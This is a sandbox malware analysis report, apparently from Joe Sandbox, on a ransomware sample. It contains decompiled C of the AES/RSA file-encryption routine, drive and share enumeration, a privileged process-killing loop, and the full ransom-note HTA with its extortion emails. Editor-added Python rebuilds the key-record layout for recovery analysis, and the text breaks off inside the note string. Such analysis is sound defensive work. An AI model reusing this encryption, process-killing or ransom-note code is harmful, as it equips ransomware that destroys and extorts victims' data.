    • Opcode ID: aa36bdb46a48c8bc4b72e55a2e5d77653a2ea84c6b11e826cca7d57258d30290
    • Instruction ID: b0a1643d7e9e57bc3e1be9d92316a81e3967ff597d52ac60f2e66cf42192e3bd
    • Opcode Fuzzy Hash: aa36bdb46a48c8bc4b72e55a2e5d77653a2ea84c6b11e826cca7d57258d30290
    • Instruction Fuzzy Hash: 62F06774B843013AFA1032B29C47F6F2A588B00B19F34013BBB00BA1F3D9FC6940426C
    Uniqueness

    Uniqueness Score: -1,00%
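
    The two discovery routines (E00401131 for network shares, E004016FF for local drives) decide which paths the E004014CC workers receive. The Python below is an example added by the editor; it is not code from the sample and not something Joe Sandbox produces. It re-creates the target-selection logic on constructed input so the ordering and the filters can be checked against the decompilation: the drive mask is walked from bit 0x19 (Z:) down to bit 0 (A:) with no drive-type filter, and NETRESOURCE entries are either recursed into (any usage other than 1) or turned into a `\\server\share\*.*` target when their remote name starts with `\\`. The drive mask and the NETRESOURCE tree are made up for the example; the dictionary field names are the editor's.

```python
"""Added example (editor's code, not from the sample or from Joe Sandbox):
simulates the target selection of E004016FF (GetLogicalDrives bitmask) and
E00401131 (recursive WNetEnumResource walk). All input below is constructed."""

RESOURCEUSAGE_CONNECTABLE = 1      # the only dwUsage value E00401131 treats as a share
DRIVE_TEMPLATE = "\\\\?\\C:\\*.*"   # L"\\?\C:\*.*"; index 4 is the letter that gets patched


def drive_targets(logical_drives_mask: int) -> list:
    """Mirror the loop at 0x00401729-0x0040177d: bits 0x19..0, letter 'A' + bit.

    No GetDriveType() call is made, so removable and network drives are
    included exactly as the sample does."""
    targets = []
    for bit in range(0x19, -1, -1):
        if (1 << bit) & logical_drives_mask:
            path = list(DRIVE_TEMPLATE)
            path[4] = chr(0x41 + bit)           # _t8[4] = _t15 + 0x41
            targets.append("".join(path))
    return targets


def share_targets(entries: list) -> list:
    """Mirror E00401131 over a constructed NETRESOURCE tree.

    Each entry is a dict with 'usage' and 'remote' and, for containers,
    'children' (what WNetEnumResource would return for that container)."""
    targets = []
    for entry in entries:
        if entry["usage"] == RESOURCEUSAGE_CONNECTABLE:
            remote = entry.get("remote") or ""
            if remote.startswith("\\\\"):       # *(lpRemoteName) == 0x5c5c
                targets.append(remote + "\\*.*")  # *_t60 = 0x2a2e2a5c, then NUL
        else:
            # container (domain, server, ...): the sample calls itself with this entry
            targets.extend(share_targets(entry.get("children", [])))
    return targets


# Constructed input: C:, D: and Z: present (bits 2, 3 and 25).
SAMPLE_MASK = (1 << 2) | (1 << 3) | (1 << 25)

# Constructed network tree: a workgroup containing one server with two shares,
# one of which has a non-UNC remote name and must be skipped, plus a top-level share.
SAMPLE_NETWORK = [
    {"usage": 2, "remote": "WORKGROUP", "children": [
        {"usage": 2, "remote": "\\\\FILESRV", "children": [
            {"usage": 1, "remote": "\\\\FILESRV\\Public"},
            {"usage": 1, "remote": "FILESRV\\NotUnc"},
        ]},
    ]},
    {"usage": 1, "remote": "\\\\NAS\\Backups"},
]

if __name__ == "__main__":
    for target in drive_targets(SAMPLE_MASK) + share_targets(SAMPLE_NETWORK):
        print(target)
```

    The sample hands the workers the wide-character form of these strings (E00401131 converts with MultiByteToWideChar, E004016FF patches the wide template in place). The `\\?\` prefix on the local targets tells the file APIs to skip path normalisation and the MAX_PATH limit, so the directory walk reaches paths that a plain `C:\` prefix would not.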

    C-Code - Quality: 100%
    			// Allocator behind every path and NETRESOURCE buffer: GlobalAlloc with
    			// GMEM_ZEROINIT (0x40), retried every 200 ms until it succeeds, so a caller
    			// never continues with a NULL buffer and never gives up under memory pressure.
    			E00401781(long _a4) {
    				void* _t2;
    				void* _t3;
    
    				while(1) {
    					_t2 = GlobalAlloc(0x40, _a4); // executed
    					_t3 = _t2;
    					if(_t3 != 0) {
    						break;
    					}
    					Sleep(0xc8); // 200 ms, then retry
    				}
    				return _t3;
    			}

    Instruction addresses of the listing above: 0x00401784 to 0x0040179f

    APIs
    • GlobalAlloc.KERNEL32(00000040,?,?,004010A6,00008000), ref: 00401789
    • Sleep.KERNEL32(000000C8,00000040,?,?,004010A6,00008000), ref: 00401797
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: AllocGlobalSleep
    • String ID:
    • API String ID: 3298491466-0
    • Opcode ID: 7832efefc5be9b14c12cba2e4d46ab7235feb5e85635f8b8aa422e3e06fd54af
    • Instruction ID: d11a4110819027fe4db93a80e8c688afe7ee3929f15eaffbac0944ca7f306c1c
    • Opcode Fuzzy Hash: 7832efefc5be9b14c12cba2e4d46ab7235feb5e85635f8b8aa422e3e06fd54af
    • Instruction Fuzzy Hash: 69C08C2034020962D54072A28C03F5938850711BCCF004033FB05760E2D8FCC00401AE
    Uniqueness

    Uniqueness Score: -1,00%

    Non-executed Functions

    C-Code - Quality: 63%
    			// Per-file encryption routine (not executed in the sandbox run). _a4 is the
    			// worker's path buffer: the original path at offset 0, the renamed path at
    			// WCHAR offset 0x4010. _a8 is the file's WIN32_FIND_DATAW (offsets 0x1c and
    			// 0x20 below are nFileSizeHigh and nFileSizeLow). The three thunks
    			// L00401F86 / L00401F80 / L00401F7A are unresolved in this dump; their argument
    			// patterns match CryptGenKey, CryptExportKey and CryptEncrypt, which is the
    			// editor's inference from the constants and is marked as such where used.
    			// Any failure after the rename is undone by renaming the file back (L3).
    			E0040128D(WCHAR* _a4, intOrPtr _a8) {
    				void* _v8;
    				long _v12;
    				void* _v16;
    				void* _v20;
    				long* _v24;
    				long* _v28;
    				long _v32;
    				void _v288;   // work buffer: exported key blob + file metadata, later the encrypted record
    				WCHAR* _t51;
    				WCHAR* _t52;
    				WCHAR* _t55;
    				void* _t56;
    				void* _t57;
    				int _t62;
    				long** _t65;
    				void* _t67;
    				intOrPtr _t68;
    				unsigned int _t69;
    				void* _t70;
    				void* _t76;
    				void* _t95;
    				intOrPtr _t96;
    
    				asm("pushad");
    				_t51 = _a4;
    				_t52 =  &(_t51[0x4010]);
    				_push(_t52);
    				if(MoveFileW(_t51, _t52) != 0) { // rename first; a failed rename skips the file entirely
    					_pop(_t55);
    					_t56 = CreateFileW(_t55, 0xc0000000, 0, 0, 3, 0, 0); // GENERIC_READ | GENERIC_WRITE, no sharing, OPEN_EXISTING
    					if(_t56 != 0xffffffff) {
    						_v8 = _t56;
    						_t57 = CreateFileMappingA(_v8, 0, 4, 0, 0, 0); // PAGE_READWRITE over the whole file
    						if(_t57 <= 0) {
    							L8:
    							CloseHandle(_v8);
    							goto L3;
    						} else {
    							_v16 = _t57;
    							if(CryptAcquireContextA( &_v24, 0, 0, 0x18, 0xf0000000) == 1) { // PROV_RSA_AES, CRYPT_VERIFYCONTEXT
    								_t65 =  &_v28;
    								_push(_t65);
    								_push(1);        // CRYPT_EXPORTABLE
    								_push(0x6610);   // CALG_AES_256
    								_push(_v24);
    								L00401F86();     // argument pattern of CryptGenKey(hProv, CALG_AES_256, CRYPT_EXPORTABLE, &hKey)
    								if(_t65 == 1) {
    									_v32 = 0x2c;   // 8-byte BLOBHEADER + 4-byte key length + 32-byte key
    									_push( &_v32);
    									_t67 =  &_v288;
    									_push(_t67);
    									_push(0);
    									_push(8);      // PLAINTEXTKEYBLOB
    									_push(0);
    									_push(_v28);
    									L00401F80();   // argument pattern of CryptExportKey(hKey, 0, PLAINTEXTKEYBLOB, 0, &_v288, &_v32): raw key at record offset 0
    									if(_t67 == 1) {
    										_t96 = _a8;
    										_t95 =  &_v288;
    										_t68 =  *((intOrPtr*)(_t96 + 0x1c)); // nFileSizeHigh
    										 *((intOrPtr*)(_t95 + 0x2c)) = _t68;  // record +0x2c
    										if(_t68 <= 0) {
    											_t69 =  *(_t96 + 0x20);          // nFileSizeLow
    											 *(_t95 + 0x30) = _t69;          // record +0x30
    											if(_t69 >= 0x100000) {
    												if(_t69 > 0x100000) {
    													_t69 = 0x100000;        // cap: only the first 1 MiB is encrypted
    												}
    											} else {
    												_t69 = _t69 >> 5 << 5;      // round down to a 32-byte multiple; the tail stays in clear
    											}
    										} else {
    											 *(_t95 + 0x30) =  *(_t96 + 0x20);
    											_t69 = 0x100000;                // file of 4 GiB or more: 1 MiB
    										}
    										 *(_t95 + 0x34) = _t69;             // record +0x34: number of encrypted bytes
    										_v32 = _t69;
    										_t70 = MapViewOfFile(_v16, 2, 0, 0, _v32); // FILE_MAP_WRITE over the first _v32 bytes
    										if(_t70 <= 0) {
    											goto L14;
    										} else {
    											_v20 = _t70;
    											 *(_t95 + 0x38) =  *_t70;            // record +0x38: original first DWORD of the file
    											 *((char*)(_t95 + 0x3e)) = 0x33;     // record +0x3e: marker byte
    											_v12 = 0x40;                         // record length before encryption
    											_push(0x100);                        // output buffer: 0x100 bytes
    											_push( &_v12);
    											_t76 =  &_v288;
    											_push(_t76);
    											_push(0);
    											_push(1);                            // Final == TRUE
    											_push(0);
    											_push( *0x403abb);                   // global key handle imported elsewhere; the 0x100-byte output suggests a 2048-bit RSA public key
    											L00401F7A();   // argument pattern of CryptEncrypt(hPubKey, 0, TRUE, 0, &_v288, &_v12, 0x100): seals the key record
    											if(_t76 == 1) {
    												_push(_v32);
    												_push( &_v32);
    												_push(_v20);
    												_push(0);
    												_push(0);                        // Final == FALSE: no padding, in place
    												_push(0);
    												_push(_v28);
    												L00401F7A();   // argument pattern of CryptEncrypt(hKey, 0, FALSE, 0, view, &_v32, _v32): AES over the mapped chunk
    												UnmapViewOfFile(_v20);
    												CloseHandle(_v16);
    												CryptDestroyKey(_v28);
    												CryptReleaseContext(_v24, 0);
    												_push(2);                        // FILE_END
    												SetFilePointerEx(_v8, 0, 0, 0);
    												WriteFile(_v8,  &_v288, 0x100,  &_v12, 0);   // append the 0x100-byte encrypted key record
    												WriteFile(_v8, 0x4040e0, 0x500,  &_v12, 0);  // append 0x500 bytes of static data from 0x004040e0
    												CloseHandle(_v8);
    												_t62 = SetFileAttributesW( &(_a4[0x4010]), 1); // FILE_ATTRIBUTE_READONLY on the renamed file
    											} else {
    												goto L14;
    											}
    										}
    									} else {
    										L14:
    										CryptDestroyKey(_v28);
    										goto L12;
    									}
    								} else {
    									L12:
    									CryptReleaseContext(_v24, 0);
    									goto L10;
    								}
    							} else {
    								L10:
    								CloseHandle(_v16);
    								goto L8;
    							}
    						}
    					} else {
    						while(1) {
    							L3:
    							_t62 = MoveFileW( &(_a4[0x4010]), _a4); // could not process: restore the original name, retrying every 200 ms
    							if(_t62 != 0) {
    								break;
    							}
    							Sleep(0xc8);
    						}
    					}
    				} else {
    					_pop(_t62);
    				}
    				asm("popad");
    				return _t62;
    			}

    Instruction addresses of the listing above: 0x00401296 to 0x004014c9

    APIs
    • MoveFileW.KERNEL32(?,?), ref: 004012A4
    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 004012C4
    • MoveFileW.KERNEL32(?,?), ref: 004012DA
    • Sleep.KERNEL32(000000C8,?,?,?,?,00000000,00000004,00000000,00000000,00000000,?,C0000000,00000000,00000000,00000003,00000000), ref: 004012E8
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: File$Move$CreateSleep
    • String ID: ,$@
    • API String ID: 2501303177-1227015840
    • Opcode ID: d0a331b171ffca60f20f239a969b54affadaf494ef6a999c2c785b2d56c08486
    • Instruction ID: 5a792c085b85204088bbff500eab9d33f6de6564df96690a2bd5524aa7c615fe
    • Opcode Fuzzy Hash: d0a331b171ffca60f20f239a969b54affadaf494ef6a999c2c785b2d56c08486
    • Instruction Fuzzy Hash: 96618370A40209BAEF219BA1CC43FEE7674BB04704F204137BA01F95F1D7B9AA519B5D
    Uniqueness

    Uniqueness Score: -1,00%
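
    E0040128D fixes the on-disk layout of an encrypted file: the first min(size, 1 MiB) bytes, rounded down to a multiple of 32, are AES-encrypted in place; a 0x40-byte record holding the exported key blob, the file size, the encrypted length, the file's original first DWORD and a 0x33 marker is encrypted with the global key at 0x403abb into 0x100 bytes and appended; then 0x500 bytes copied from 0x004040e0 follow. The same 0x2c-byte PLAINTEXTKEYBLOB size appears in E00401063, which imports one to decrypt the embedded data block. The Python below is an example added by the editor, not the sample's code and not Joe Sandbox output: it builds and parses those structures on constructed data so the offsets in the decompilation can be verified, and shows how much of a file this scheme leaves in clear text. The field names are the editor's; that the appended 0x100 bytes are RSA-2048 output is an assumption drawn from the buffer size, and the example does not perform that encryption.

```python
"""Added example (editor's code, not from the sample or from Joe Sandbox):
the CryptoAPI key blob and the per-file metadata record used by E0040128D
(the same 0x2c-byte blob size is imported by E00401063). All keys, sizes
and file contents below are constructed test data."""
import struct

# wincrypt.h constants
PLAINTEXTKEYBLOB = 0x8
CUR_BLOB_VERSION = 0x2
CALG_AES_256 = 0x6610

BLOB_LEN = 0x2C       # 8-byte BLOBHEADER + 4-byte key length + 32-byte key; _v32 = 0x2c
RECORD_LEN = 0x40     # _v12 = 0x40 before the record is encrypted
RSA_OUT_LEN = 0x100   # output buffer passed to the first L00401F7A call (assumed RSA-2048)
TRAILER_LEN = 0x500   # second WriteFile: bytes copied from 0x004040E0
MAX_CHUNK = 0x100000  # at most 1 MiB of each file is AES-encrypted
MARKER = 0x33         # byte stored at record offset 0x3e


def build_plaintext_keyblob(key: bytes) -> bytes:
    """Lay out what CryptExportKey(hKey, 0, PLAINTEXTKEYBLOB, ...) returns for a
    CALG_AES_256 key: BLOBHEADER{bType, bVersion, reserved, aiKeyAlg}, DWORD keysize, key."""
    if len(key) != 32:
        raise ValueError("AES-256 key must be 32 bytes")
    header = struct.pack("<BBHI", PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, CALG_AES_256)
    return header + struct.pack("<I", len(key)) + key


def parse_plaintext_keyblob(blob: bytes) -> dict:
    if len(blob) != BLOB_LEN:
        raise ValueError("expected 0x%x bytes, got 0x%x" % (BLOB_LEN, len(blob)))
    btype, version, _reserved, algid = struct.unpack_from("<BBHI", blob, 0)
    (key_len,) = struct.unpack_from("<I", blob, 8)
    if btype != PLAINTEXTKEYBLOB or version != CUR_BLOB_VERSION or algid != CALG_AES_256 or key_len != 32:
        raise ValueError("not an AES-256 PLAINTEXTKEYBLOB")
    return {"algid": algid, "key": blob[12:12 + key_len]}


def chunk_length(size_high: int, size_low: int) -> int:
    """Number of bytes the sample encrypts, following 0x004013A5-0x004013D5."""
    if size_high > 0 or size_low >= MAX_CHUNK:
        return MAX_CHUNK
    return (size_low >> 5) << 5   # 32-byte multiple; a tail of up to 31 bytes stays in clear


def build_record(key: bytes, file_size: int, first_dword: int) -> bytes:
    """The 0x40-byte plaintext record as it sits in _v288 before the RSA step."""
    size_high, size_low = file_size >> 32, file_size & 0xFFFFFFFF
    rec = bytearray(RECORD_LEN)
    rec[0:BLOB_LEN] = build_plaintext_keyblob(key)                      # +0x00 key blob
    struct.pack_into("<III", rec, 0x2C, size_high, size_low,            # +0x2c, +0x30
                     chunk_length(size_high, size_low))                 # +0x34
    struct.pack_into("<I", rec, 0x38, first_dword)                      # +0x38
    rec[0x3E] = MARKER                                                  # +0x3e
    return bytes(rec)


def parse_record(rec: bytes) -> dict:
    """Inverse of build_record: what a decryptor reads once the RSA layer is removed."""
    if len(rec) != RECORD_LEN or rec[0x3E] != MARKER:
        raise ValueError("not a 0x40-byte record carrying the 0x33 marker")
    size_high, size_low, chunk = struct.unpack_from("<III", rec, 0x2C)
    (first_dword,) = struct.unpack_from("<I", rec, 0x38)
    return {
        "key": parse_plaintext_keyblob(rec[:BLOB_LEN])["key"],
        "file_size": (size_high << 32) | size_low,
        "chunk_length": chunk,
        "first_dword": first_dword,
    }


def split_encrypted_file(data: bytes) -> dict:
    """Cut a file written by E0040128D into its parts. The AES pass replaced the
    chunk in place, so the body length equals the original file size, and
    everything past chunk_length() was never touched."""
    if len(data) < RSA_OUT_LEN + TRAILER_LEN:
        raise ValueError("too short to carry the appended key record and trailer")
    body_len = len(data) - RSA_OUT_LEN - TRAILER_LEN
    body = data[:body_len]
    chunk = chunk_length(body_len >> 32, body_len & 0xFFFFFFFF)
    return {
        "encrypted_bytes": body[:chunk],
        "clear_bytes": body[chunk:],
        "rsa_blob": data[body_len:body_len + RSA_OUT_LEN],
        "trailer": data[body_len + RSA_OUT_LEN:],
    }
```

    Two consequences follow from the arithmetic. A file larger than 1 MiB keeps everything beyond its first MiB in clear, and a small file keeps up to 31 trailing bytes, so partial recovery of large documents and archives is possible without the key. Conversely, the per-file key exists only inside the appended 0x100-byte record, so a triage process that strips or truncates the trailer of affected files destroys the one thing a later decryptor would need.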

    Control-flow Graph (basic blocks and edges recovered from the graph image)

    • 159: 401d2d-401d3d call 401de7 -> 161
    • 161: 401d42-401d61 CreateToolhelp32Snapshot Process32FirstW -> 162
    • 162: 401d66-401d69 -> 163, 164
    • 163: 401dd2-401de2 CloseHandle Sleep -> 161
    • 164: 401d6b -> 165
    • 165: 401d71-401d80 lstrcmpiW -> 166, 167
    • 166: 401d82-401d91 lstrlenW -> 168, 169
    • 167: 401dc3-401dd0 Process32NextW -> 162
    • 168: 401d93 -> 165
    • 169: 401d95-401da0 GetCurrentProcessId -> 167, 170
    • 170: 401da2-401db3 OpenProcess -> 167, 171
    • 171: 401db5-401dbe TerminateProcess CloseHandle -> 167
    C-Code - Quality: 100%
    			// Process-killing loop that never returns. After enabling SeDebugPrivilege via
    			// E00401DE7 it snapshots all processes once a second. _t25 walks a
    			// double-NUL-terminated list of process names; the decompiler dropped its
    			// (re)initialisation, most likely the single-instruction block at 0x00401d6b,
    			// and the API log shows it pointing at "[System process]". A process whose
    			// image name matches an entry is left alone; one that matches no entry is
    			// terminated, unless it is this process. The list is therefore an allow-list:
    			// everything not on it is killed, every second, for as long as the sample runs.
    			E00401D2D() {
    				short _v524;     // PROCESSENTRY32W.szExeFile (offset 0x24)
    				long _v552;      // PROCESSENTRY32W.th32ProcessID (offset 8)
    				void* _v560;     // PROCESSENTRY32W.dwSize
    				struct tagPROCESSENTRY32W* _t10;
    				void* _t21;
    				void* _t24;
    				WCHAR* _t25;
    
    				E00401DE7(0x403a19, 1); // the same argument resolves to "SeDebugPrivilege" in the other memory dump
    				while(1) {
    					_t24 = CreateToolhelp32Snapshot(2, 0); // TH32CS_SNAPPROCESS
    					_v560 = 0x22c;                         // sizeof(PROCESSENTRY32W)
    					_t10 =  &_v560;
    					Process32FirstW(_t24, _t10);
    					while(_t10 != 0) {
    						while(lstrcmpiW( &_v524, _t25) != 0) { // case-insensitive compare with the current list entry
    							_t25 =  &(_t25[lstrlenW(_t25) + 1]); // advance to the next entry
    							if( *_t25 == 0) {                    // end of list: nothing matched
    								if(GetCurrentProcessId() != _v552) {
    									_t21 = OpenProcess(1, 0, _v552); // PROCESS_TERMINATE
    									if(_t21 != 0) {
    										TerminateProcess(_t21, 0);
    										CloseHandle(_t21);
    									}
    								}
    								break;
    							} else {
    								continue;
    							}
    						}
    						_t10 = Process32NextW(_t24,  &_v560);
    					}
    					CloseHandle(_t24);
    					Sleep(0x3e8); // 1 s between sweeps
    				}
    			}

    Instruction addresses of the listing above: 0x00401d3d to 0x00401ddd

    APIs
      • Part of subcall function 00401DE7: OpenProcessToken.ADVAPI32(000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000,00403ABB), ref: 00401DF5
      • Part of subcall function 00401DE7: LookupPrivilegeValueA.ADVAPI32(00000000,00008000,00000000), ref: 00401E07
      • Part of subcall function 00401DE7: AdjustTokenPrivileges.ADVAPI32(00008000,00000000,00000001,00000000,00000000,00000000,000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500), ref: 00401E3C
      • Part of subcall function 00401DE7: CloseHandle.KERNEL32(00008000,000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000), ref: 00401E44
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401D46
    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00401D61
    • lstrcmpiW.KERNEL32(?,?,00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401D79
    • lstrlenW.KERNEL32(?,?,?,00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401D83
    • GetCurrentProcessId.KERNEL32(?,?,?,00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401D95
    • OpenProcess.KERNEL32(00000001,00000000,?,?,?,?,00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401DAC
    • TerminateProcess.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,?,?,?,00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401DB9
    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,?,?,?,00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401DBE
    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00401DCB
    • CloseHandle.KERNEL32(00000000), ref: 00401DD3
    • Sleep.KERNEL32(000003E8,00000000), ref: 00401DDD
    Memory Dump Source
    • Source File: 00000000.00000002.2314699615.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2314689692.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000002.2314712936.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000002.2314722815.0000000000403000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_module.jbxd
    Similarity
    • API ID: Process$CloseHandle$OpenProcess32Token$AdjustCreateCurrentFirstLookupNextPrivilegePrivilegesSleepSnapshotTerminateToolhelp32Valuelstrcmpilstrlen
    • String ID:
    • API String ID: 1125620571-0
    • Opcode ID: 2635ff061ca8914c2d9180501c8d943a13cba462529c84550a6d81b87420486c
    • Instruction ID: c66f2fec3916f796175e6449ba9ccfba13e260c703c5d1e17e7cbe5dabbd16b8
    • Opcode Fuzzy Hash: 2635ff061ca8914c2d9180501c8d943a13cba462529c84550a6d81b87420486c
    • Instruction Fuzzy Hash: 2701566161021576D72177F2DC47FAE719C5F04344F10087BB645F51F3DABCAA8146AD
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 100%
    			// Same routine as listed above, from the other memory dump, in which the data
    			// block has been decoded: the privilege name reads "SeDebugPrivilege" and the
    			// API log shows the list pointer _t25 at "[System process]". Behaviour is identical.
    			E00401D2D() {
    				short _v524;
    				long _v552;
    				void* _v560;
    				struct tagPROCESSENTRY32W* _t10;
    				void* _t21;
    				void* _t24;
    				WCHAR* _t25;
    
    				E00401DE7("SeDebugPrivilege", 1);
    				while(1) {
    					_t24 = CreateToolhelp32Snapshot(2, 0);
    					_v560 = 0x22c;
    					_t10 =  &_v560;
    					Process32FirstW(_t24, _t10);
    					while(_t10 != 0) {
    						while(lstrcmpiW( &_v524, _t25) != 0) {
    							_t25 =  &(_t25[lstrlenW(_t25) + 1]);
    							if( *_t25 == 0) {
    								if(GetCurrentProcessId() != _v552) {
    									_t21 = OpenProcess(1, 0, _v552);
    									if(_t21 != 0) {
    										TerminateProcess(_t21, 0);
    										CloseHandle(_t21);
    									}
    								}
    								break;
    							} else {
    								continue;
    							}
    						}
    						_t10 = Process32NextW(_t24,  &_v560);
    					}
    					CloseHandle(_t24);
    					Sleep(0x3e8);
    				}
    			}

    Instruction addresses of the listing above: 0x00401d3d to 0x00401ddd

    APIs
      • Part of subcall function 00401DE7: OpenProcessToken.ADVAPI32(000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000,@l), ref: 00401DF5
      • Part of subcall function 00401DE7: LookupPrivilegeValueA.ADVAPI32(00000000,00008000,00000000), ref: 00401E07
      • Part of subcall function 00401DE7: AdjustTokenPrivileges.ADVAPI32(00008000,00000000,00000001,00000000,00000000,00000000,000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500), ref: 00401E3C
      • Part of subcall function 00401DE7: CloseHandle.KERNEL32(00008000,000000FF,00000028,00008000,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000), ref: 00401E44
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401D46
    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00401D61
    • lstrcmpiW.KERNEL32(?,[System process],00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401D79
    • lstrlenW.KERNEL32([System process],?,[System process],00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401D83
    • GetCurrentProcessId.KERNEL32([System process],?,[System process],00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401D95
    • OpenProcess.KERNEL32(00000001,00000000,?,[System process],?,[System process],00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401DAC
    • TerminateProcess.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,[System process],?,[System process],00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401DB9
    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,[System process],?,[System process],00000000,0000022C,00000002,00000000,000003E8,00000000), ref: 00401DBE
    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00401DCB
    • CloseHandle.KERNEL32(00000000), ref: 00401DD3
    • Sleep.KERNEL32(000003E8,00000000), ref: 00401DDD
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: Process$CloseHandle$OpenProcess32Token$AdjustCreateCurrentFirstLookupNextPrivilegePrivilegesSleepSnapshotTerminateToolhelp32Valuelstrcmpilstrlen
    • String ID: SeDebugPrivilege$[System process]
    • API String ID: 1125620571-1351572248
    • Opcode ID: 2635ff061ca8914c2d9180501c8d943a13cba462529c84550a6d81b87420486c
    • Instruction ID: c66f2fec3916f796175e6449ba9ccfba13e260c703c5d1e17e7cbe5dabbd16b8
    • Opcode Fuzzy Hash: 2635ff061ca8914c2d9180501c8d943a13cba462529c84550a6d81b87420486c
    • Instruction Fuzzy Hash: 2701566161021576D72177F2DC47FAE719C5F04344F10087BB645F51F3DABCAA8146AD
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 100%
    			E00401096(WCHAR* _a4) {
    				void* _v8;
    				WCHAR* _v12;
    				long _v16;
    				WCHAR* _t18;
    
    				_t18 = E00401781(0x8000);
    				_v12 = _t18;
    				lstrcpyW(_v12, _a4);
    				 *((char*)(_v12 + lstrlenW(_v12) * 2 - 6)) = 0;
    				lstrcatW(_v12, L"Decoding help.hta");
    				if(GetFileAttributesW(_v12) == 0xffffffff) {
    					_v8 = CreateFileW(_v12, 0x40000000, 2, 0, 2, 0, 0);
    					WriteFile(_v8, "<html><head><hta:application id=1\r\nshowInTaskBar=no\r\ncaption=no\r\nborder=none\r\ninnerBorder=no\r\nscroll=no\r\ncontextmenu=no\r\nwindowstate=maximize />\r\n<script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!=\'undefined\'?Y:now.getFullYear();Z=Z?Z-1:now.getMonth();D=typeof(D)!=\'undefined\'?D:now.getDate();H=typeof(H)!=\'undefined\'?H:now.getHours();M=typeof(M)!=\'undefined\'?M:now.getMinutes();var endDate=new Date(Y,Z,D,H,M,s+1);var i=setInterval(function(){var t=endDate.getTime()-now.getTime();if(t<0){clearInterval(i);alert(\'Time is up!\');}else{var d=Math.floor(t/864e5);var h=Math.floor(t/36e5)%24;var o=Math.floor(t/6e4)%60;var p=Math.floor(t/1e3)%60;var i=\'<div style=\"width:90px;float:left;text-align:center\"><div style=\"font-size:65px;\">\';var l=\'</div><div>\';var e=\'</div></div><div style=\"float:left;font-size:60px;\">:</div>\';document.getElementById(\'X\').innerHTML=i+d+l+\'Day\'+e+i+h+l+\'Hours\'+e+i+o+l+\'Minutes\'+e+i+p+l+\'Seconds\';if(!p&&!o&&!d&&!h){clearInterval(i);alert(\'Time is up!\');}}now.setSeconds(now.getSeconds()+1);},1000);}C(00,00,12,04,05,2019);</script></head><body style=\'text-align:center;background:#000\'></br></br></br><h2 style=\'font-size:40px;color:#b00\'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonStokton@tutanota.com</h2></br></br><h1 style=\'color:#FFF\'>Your<h2 style=\'font-size:40px;color:#00F\'> [ID]XE0PGVAVqcuaklH3[ID]</h2></br>1. In the subject line, write your ID.</br>2. Attach 1-2 infected files that do not contain important information (less than 2 mb)</br>are required to generate the decoder and restore the test file.</br>Hurry up! Time is limited!</br>Attention!!!</br>At the end of this time, the private key for generating the decoder will be destroyed. 
